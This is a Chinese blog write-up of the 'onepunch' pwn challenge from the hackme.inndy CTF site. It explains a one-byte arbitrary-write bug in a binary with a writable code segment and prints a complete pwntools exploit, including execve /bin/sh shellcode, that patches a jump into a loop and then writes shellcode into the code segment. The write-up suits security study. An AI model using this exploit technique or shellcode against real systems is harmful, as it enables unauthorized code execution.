onepunch的wp

最新推荐文章于 2023-10-25 15:07:02 发布
最新推荐文章于 2023-10-25 15:07:02 发布
阅读量2.9k 收藏
点赞数
分类专栏: ctf的wp 文章标签: wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/niexinming/article/details/78542089
版权

https://hackme.inndy.tw/scoreboard/ 题目很有趣,我做了onepunch这个题目感觉还不错,我把wp分享出来,方便大家学习
onepunch的题目要求是: 

nc hackme.inndy.tw 7718

Punch!

这个题目没有太多提示
下面我用ida打开smashthestack这个程序看main函数
image
这个程序在16行有一个任意地址写的漏洞,程序输入的第一个数字是写入的地址,第二个数字是写入的数,但是这个程序只能写一个字节的数据到指定地址
先运行一下程序看一下这个程序干了啥
image
再看看程序开启了哪些保护:
image
看到NX enabled是开启了栈不可执行,而且这个程序还有canary保护,但是这个程序没有开启地址随机化
用gdb加载一下这个程序
image
用vmmap这个指令可以看到代码段可读写,这个题目一下子就简单了,通过任意地址的写,把shellcode写入内存中,然后执行起来,先看一下汇编代码
image
可以看到在任意地址写这个漏洞之后有个条件跳转(0000000000400767),可以控制这个跳转向上跳转到输入的地方(000000000040072C)从而使这段代码变成一个循环,可以看一下jz short loc_400756对应的字节码是75 0a,75是jnz,0a是跳转的偏移,所以就刚刚好通过第一次写操作把这个0a改掉,所以程序开始时输入400768 -61就可以让这个程序变成一个循环了
image
这样通过这个循环把0000000000400769后面的代码变成shellcode就可以了,关于shellcode,里面不能出现255,如果有255的话,shellcode就会被程序截断,我找了半天,找到一个好用的shellcode:https://www.exploit-db.com/exploits/36858/
这样就可以实现exp了: 

#-*- coding: utf-8 -*-
__Auther__ = 'niexinming'

from pwn import *
import binascii
import time
context(terminal = ['gnome-terminal', '-x', 'sh', '-c'], arch = 'amd64', os = 'linux', log_level = 'debug')

def debug(addr = '0x000000000040075d'):
    raw_input('debug:')
    gdb.attach(io, "b *" + addr)



elf = ELF('/home/h11p/hackme/onepunch')
stack_chk_fail=elf.got['__stack_chk_fail']
print "%x" % stack_chk_fail


#shellcode=asm(shellcraft.amd64.linux.sh())
#str_shellcode=str(binascii.b2a_hex(shellcode))
#https://www.exploit-db.com/exploits/36858/
shellcode="\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
addr=0x0400769

#io = process('/home/h11p/hackme/onepunch')

io = remote('hackme.inndy.tw', 7718)

payload1 = '400768'
payload2 = '-61'


#debug()

time.sleep(1)
io.recvuntil('Where What?')
io.sendline(payload1)
io.sendline(payload2)
'''
for i in xrange(0,len(str_shellcode),2):
    io.sendline(hex(addr))
    io.sendline(str(int(str_shellcode[i:i+2],16)))
    addr=addr+0x1
'''


for i in shellcode:
    io.sendline(hex(addr))
    io.sendline(str(ord(i)))
    addr = addr + 0x1
io.sendline('4006f3')
io.sendline(str(255))
#io.recv()
io.interactive()

io.close()

效果是:
image

niexinming
关注
专栏目录
onepunch:使用Web技术创建演示文稿的命令行界面
04-29
onepunch是用于使用Web技术创建PDF演示文稿的命令行界面。 onepunch是为设计师设计的,它不提供任何默认样式。 设计人员可以编写CSS文件并将其链接到index.html 。 先决条件 要使用onepunch ,您应该在系统中安装了...
高清壁纸一个冲床男人「HD Wallpapers One Punch Man」-crx插件
03-18
在这个扩展中,你会发现一个冲床男子的主题壁纸。 如果您想更改标签,并且是“一拳超人”的爱好者和爱好者?因此,这些壁纸适合您。 支持语言:Deutsch,English,Français,español,italiano,português (Brasil),...
hackme pwn onepunch
ACdream
03-14 492
做的题太少了,不知道应该把这种题目如何归类 int __cdecl main(int argc, const char **argv, const char **envp) { …… v5 = __isoc99_scanf("%llx %d", &v6, &v4); if ( v5 != 2 ) return 0; *v6 = v4; …… ...
一道sql注入的wp
一个码农的笔记
10-18 1217
今天做了一道题目很有意思,题目的地址是:http://118.178.18.181:57019 这个是一个sql注入的题目 首先访问http://118.178.18.181:57019/index.php,查看网页源码的时候发现题目的提示:<!--view source /source.php-->于是访问:http://118.178.18.181:57019/source.php获得题目的
One PUNCH Man——聚类
No_Game_No_Life_的博客
05-07 707
文章目录聚类介绍性能度量距离计算k-means学习向量量化高斯混合聚类密度聚类层次聚类 聚类介绍 在"无监督学习" (unsupervised learning) 中,训练样本的标记信息是未知的。目标是通过对无标记训练样本的学习来揭示数据的内在性质及规律,为进一步的数据分析提供基础。此类学习任务中研究最多、应用最广的是"聚类" (clustering). 性能度量 暂不介绍,概念太多,比较简单。和...
hackme inndy pwn onepunch writeup
charlie_heng的专栏
12-31 515
继续来做题目,这次的pwn主要功能是一个任意地址写一个字节,然后就结束。。。。 然后找了半天。。。完全没思路。。。一个字节只能写一次。。。。 然后找了下别人的wp,发现代码段居然可以写,那骚操作就可以有很多了 这里比较写入的字节是否为255,是的话就输出No flag for you jnz loc_400773二进制是\x75\x0a 0a是偏移,我们只要把这个弄成负数,就可以...
[PWN] hitcon_ctf_2019_one_punch Tcache stashing unlink attack
LDX的博客
10-25 132
Tcache attack : Tcache stashing unlink attack Largebin attack
One Punch Man Theme-crx插件
04-05
【One Punch Man Theme-crx插件】是一款专为浏览器设计的扩展程序,旨在为用户提供一个与热门动漫《一拳超人》(One Punch Man)相关的主题体验。这款插件允许用户通过简单的点击操作,即可在浏览器环境中感受到《一...
One Punch Man Wallpaper Background New Tab-crx插件
03-14
这是One Punch Man Wallpaper Background New Tab的扩展,该动画使每个人都惊讶 如果您想在观看《一拳超人》时获得完整的体验,并且想要了解Sa玉如何获得权力的真正秘诀,那么我们建议您安装《一拳超人》壁纸背景新...
One Punch Man Season 2 Wallpaper New Tab-crx插件
04-06
这是One Punch Man Season 2 Wallpaper New Tab的延伸,这部动画令所有人赞叹不已 这是对“一拳超人”的扩展。 有史以来最酷的动漫。 如果您已经看过动漫,那么毫无疑问,您应该安装此One Punch Man Season 2 ...
wordpress-api:wordpress的api接口
04-29
wordpress-api wordpress的api接口 技术支持 接口文档 注意事项 因为本站用了WP-PostViews插件(用来统计文章浏览量的,很好用),所以可以通过wp_postmeta表中的字段来获得文章浏览量,如果没有安装这个插件,那么需要删除SQL语句中与views相关的语句,否则会报错。
Hackme.inndy -> Onepunch
aoque9909的博客
08-01 228
Onepunch 这个题的想法必须得称妙了,需要对以往简单的认知进行一定的颠覆。特殊性在于程序的代码段(0x401000)具有写权限 1.通过修改程序代码段控制程序流程 程序中只能对任意一个字节改写一次,似乎没有任何利用空间,但是程序的跳转方式有点特殊,在函数内部大量使用了jz short loc_400756进行跳转。 add:jz及相似的jnz, jmp,等都是两...
[A]onepunch(tcache stash&&seccomp)
qq_33590156的博客
08-04 221
程序调用的是calloc,这个函数不会从tcache中取chunk。所以直接add free 重复填满tcache,利用uaf泄露heap和libc tcache per thread struct是来管理链表上堆块的数量的,大小一共是0x250,在heap开头。其中counts一共占0x40,每一个字节都代表一个大小范围正好对应64个entry,第一个字节代表0x10,类推。本题中数一数就是对应0x220的size的地方需要大于6,虽然我们可以申请7个0x220的chunk来让他变为7,可以通过if,但是
Android 智能指针详解 -- wp
私房菜
12-21 1万+
上一篇关于sp的博文,通过 source code 来解释了sp的功能,sp被称为强指针,但是强引用更贴切点。那么弱引用wp到底有什么功能?与sp有什么区别?这一篇通过 source code 来解释。
WordPress程序代码块高亮显示插件wp-syntax使用
wuxuhui19930209的博客
05-10 2684
WordPress程序代码块高亮显示插件wp-syntax使用 文章来源:http://www.wpdaxue.com/wp-syntax.html 1 2 3 //高亮代码内容.... 其中,lang=”html”表示代码语言为html,请根据自己需要修改; line=”1″ 表示显示行号,如果不需要,去掉即可;escaped=”
WordPress常用函数以及各模块源码文件名
weixin_30737433的博客
07-18 370
折腾了半天,终于把Blog的样式暂定为现在这样了,折腾中用到了许多函数,拿来跟大家分享下o(∩_∩)o WordPress基本模板文件 style.css : CSS(样式表)文件 index.php : 主页模板 archive.php : Archive/Category模板 404.php : 404页面,错误页模板 comments.php : 留言/回复模板 footer.php :...
WordPress详细安装步骤
seo吧
07-22 1万+
本文介绍WordPress(WP)安装方法,虽然很多IDC都会主动帮站长安装,安装过程也很简单,但毕竟是接触WordPress的开始,WP博客做的如何或多或少决定于您对WordPress了解的如何,天缘之前很少写WordPress文章,现在就从最简单的安装开始。WordPress作为极为优秀的PHP开源个人信息平台,已得到大部分站长的认同,虽然天缘博客没有使用WordPress,主要是因为Word
wp(学习总结)
qq_63162684的博客
12-12 8856
三.变量类型 概述:变量类型是指保存在该变量中的数据类型 php对变量类型看的比较淡 1.变量类型简介 1)bool(布尔型) 表达true或false,即真或假 $a=true; var_dump($a); ...
插入视频短代码WordPress函数wp_video_shortcode
热门推荐
sixeit的博客
01-19 1万+
如何给WordPress网站插入视频呢?我们一起看看插入视频短代码WordPress函数wp_video_shortcode。 wp_video_shortcode( array $attr, string $content = ‘’ ) wp_video_shortcode的官方描述,用来构建短代码输出视频。这实现了视频短代码在帖子中显示mp4的功能。 参数说明 $attr (array) (必须) 短代码属性值 ‘src’ (string) 视频资源的URL地址,默认空 ‘height’ (int) 嵌
echarts热力图修改Punch Card
最新发布
09-10
热力图(Heat Map)是ECharts中的一种图表类型,用于展示数据的密度分布,而Punch Card(打卡图)是一种特殊的热力图,常用于展示时间序列数据的分布情况,比如记录事件在特定时间发生的频率。 在ECharts中,如果你...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值